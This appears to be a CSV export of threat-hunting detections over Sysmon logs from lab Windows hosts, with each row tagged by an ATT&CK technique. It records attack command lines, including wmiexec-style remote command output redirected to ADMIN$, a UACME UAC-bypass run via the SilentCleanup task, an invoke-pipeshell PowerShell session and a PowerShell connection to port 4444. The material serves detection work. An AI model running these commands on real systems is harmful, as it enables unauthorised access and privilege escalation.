Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:36.545 + 747F3D96-E920-5F33-0000-001043920A00 + 5128 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E914-5F33-0000-001009990500 + 5144 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn 
"\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-08-03 09:46:48.842 + 747F3D96-5808-5D45-0000-0010D1FE3E00 + 1268 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-5808-5D45-0000-00106CDC3E00 + 924 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 34 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9839 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.512 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + 
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9829 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.356 + 365ABB72-B0F3-5CC8-0000-0010373E1D00 + 3328 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® 
Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549016 + + + + + Microsoft-Windows-Sysmon/Operational + 
MSEDGEWIN10 + + + + + + 2020-12-04 22:41:04.465 + 747F3D96-BB00-5FCA-0000-001033CD7600 + 8536 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-3407-5FCB-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.675 + 747F3D96-28B3-5E1E-0000-001032047C00 + 1656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,OpenURL ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User 
(IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578505 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:14.246 + 747F3D96-3A8A-607F-0000-0010E4717700 + 5280 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + 
Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-82AF-607F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342407 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:16.721 + 747F3D96-E90C-5F33-0000-0010CB420200 + 3320 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E909-5F33-0000-00108C580000 + 612 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9838 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.434 + 365ABB72-B181-5CC8-0000-0010ADBF1E00 + 3372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + 
C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + 
IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( 
) , IP ( 10.0.2.19 ) and port ( 4444 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 9813 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.794 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + NT AUTHORITY\SYSTEM + tcp + true + false + 10.0.2.18 + IEWIN7 + 49160 + + false + 10.0.2.19 + + 4444 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578503 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:13.680 + 747F3D96-3A89-607F-0000-001028587700 + 4912 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-82AE-607F-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342406 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:14.798 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + C:\Windows\system32\ + NT 
